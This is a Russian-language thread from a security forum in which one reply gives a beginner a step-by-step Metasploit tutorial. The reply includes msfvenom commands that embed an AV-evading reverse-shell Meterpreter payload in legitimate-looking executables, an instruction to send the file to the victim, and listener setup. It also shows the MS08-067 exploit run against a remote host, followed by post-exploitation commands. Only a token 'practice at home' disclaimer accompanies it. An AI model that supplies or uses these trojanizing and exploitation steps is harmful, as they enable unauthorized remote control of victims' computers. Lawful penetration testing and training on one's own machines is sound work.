HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 21.11.2016, 15:08
Shadow Stream
Guest
Сообщений: n/a
Провел на форуме:
2776

Репутация: 0
По умолчанию

Цитата:
Сообщение от NikByte  
NikByte said:

Здрасьте , ачатовцы . Я начинающий и хотел бы спросить с помощью каких средств обычно выполняется взлом удаленного пк ? В гугле nmap описывался как утилита для сканирования пк ,находящихся в локальной сети.
[*] Если вы пользуетесь KALI LINUX , то там уже встроен METASPLOIT FRAMEWORK . Советую вам с ним разобраться , очень мощная утилита (написана на Руби).

Инструмент имеет несколько конфигураций:

---------------------------------------------------------------------------------------------------------------------------------

1) Командная оболочка (msfconsole);

2) Веб-интерфейс (Metasploit Community, PRO и Express);

3) Графическая оболочка (Armitage, и более продвинутая версия - Cobalt strike).

--------------------------------------------------------------------------------------------------------------------------------

(Для дистрибутива , где нет сборки для Pentesting )Если у вас все еще нет Метасплоита — не беда, скачать его можно на официальном сайте metasploit.com

Стоит отметить, что msf корректно работает только с базой PostgreSQL.

После того как вы загрузили пакет, откроем консоль и выполним следующее:

1) cd Download/ (перейдем в каталог загрузок);

2) chmod +X metasploit-latest-linux-installer.run (даем права на запуск);

3) sudo ./metasploit-latest-linux-installer.run (запускаем графическую установку).

В качестве краткого описания ознакомимся с основными понятиями, а также рассмотрим некоторые команды MSF.

[*] Exploit— Фрагмент кода, использующий уязвимость в ПО или ОС для выполнения атаки на систему.
[*] Module — Модуль, автоматизирующий процесс какой-либо атаки.
[*] Shellcode — Шеллкод. Используется как полезная нагрузка эксплойта, обеспечивающая доступ к командной оболочке ОС.
[*] Payload — Полезная, или смысловая нагрузка. Это код, который выполняется после успешного выполнения атаки. Видов нагрузки в msf немало.
[*]«Stager» — Нагрузка, разбитая на части. Устанавливая соединение, шелл подгружается полностью.
[*]«Reverse shell» — Бэкконнект шел.
[*]«Meterpreter» — Пожалуй, один из популярных, если не самый популярный шелл. Имеет кучу возможностей: миграцию в процессы; XOR-шифрование, для обхода IDS и антивирусов; два вида dll-инжекции и т.д. Также можно выбрать «metsvc» нагрузку, что зальет и пропишет meterpreter как сервис.

Перед запуском утилиты:

service postgresql start

msfconsole

msf > db_status
[*] postgresql connected to msf3


msf >

msf > msfvenom

Давайте смотреть на некоторые самые важные варианты в этом списке.

================================================== ==================

- p определяет полезный груз Metasploit, который мы хотим использовать.

- e определяет кодирующее устройство, которое мы хотим использовать.

- a определение архитектуры, которую мы хотим использовать (дефолт - x86),

- s определяет максимальный размер полезного груза.

- iопределяю количество повторений, с которыми можно закодировать полезный груз.

- x определяет пользовательский исполняемый файл использовать в качестве шаблона

================================================== =======================

msf > msfvenom -l encoders

msf > msfvenom -p -o

msf >msfvenom -p windows/meterpreter/reverse_tcp -0


msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -x /usr/share/chess.exe -e x86/shikata_ga_nai -i 200 -f exe >chess.exe

- p/windows/meterpreter/reverse_tcp определяет полезный груз, который мы хотим включить

LHOST назначает местного хозяина (ipconfigпропишите)

LPORT определяет порт, на котором мы хотим послушать

- x определяет шаблон, который мы хотим использовать и путь к нему

- e x86/shikata_ga_nai определяет кодирующее устройство, которое мы хотим использовать

- i 200 представляет количество повторений

- f exe -> создать исполняемый файл (.exe)

chess.exe название файла

----------------------------------------------------------------------------------------

msf > use exploit/multi/handler

msf > set PAYLOAD windows/meterpreter/reverse_http

msf > set LHOST 192.168.141.122

msf > set LPORT 4444

msf > exploit


----------------------------------------------------------------------------------------

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.73.128 LPORT=4444 -e x86/shikata_ga_nai -i 10 -x /root/Desktop/installer.exe -f exe > /root/Desktop/installer.exe

give victim- отправляем жертве

msf > use exploit/multi/handler

msf > set PAYLOAD windows/meterpreter/reverse_http

msf > set LHOST 192.168.73.128

msf > set LPORT 4444

msf > exploit


-----------------------------------------------------------------------------------------

msfconsole

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > show options

msf exploit(ms08_067_netapi) > set RHOST 192.168.1.4

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp


Теперь опции также включают опции полезной нагрузки.

Важные опции установить являются LHOST и LPORT.

Немного подробнее:

================================================== ===============================

LHOST - IP-адрес локальной машины или машины хакера.

LPORT - номер порта, на котором обратный слушатель оболочки получит входящую оболочку.


================================================== ================================

msf exploit(ms08_067_netapi) > set LHOST 192.168.1.33

msf exploit(ms08_067_netapi) > set LPORT 6666

msf exploit(ms08_067_netapi) > exploit

meterpreter >


meterpreter > sysinfo

meterpreter > ipconfig

meterpreter > run vnc


Ссылки

www.metasploit.com — Официальный сайт Метасплоита

www.offensive-security.com/metasploit-unleashed/Main_Page — Официальная документация по metasploit



Meterpreter


github.com/darkoperator/MSF-Installer — Скрипт автоматической установки metasploit

community.rapid7.com/docs/DOC-2100 — Подробная установка metasploit (linux)

Практикуйте у себя дома на своих компах ! Не забывайте про закон !

Happy Hacking )
 
Ответить с цитированием

  #12  
Старый 21.11.2016, 15:14
Turanchocks_
Guest
Сообщений: n/a
Провел на форуме:
460772

Репутация: 17
По умолчанию

Цитата:
Сообщение от NikByte  
NikByte said:

Спасибо , буду пробовать )) А как вы до этого дошли ,если не секрет ?)
Терпя унижения и насмешки старших бородатых товарищей.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ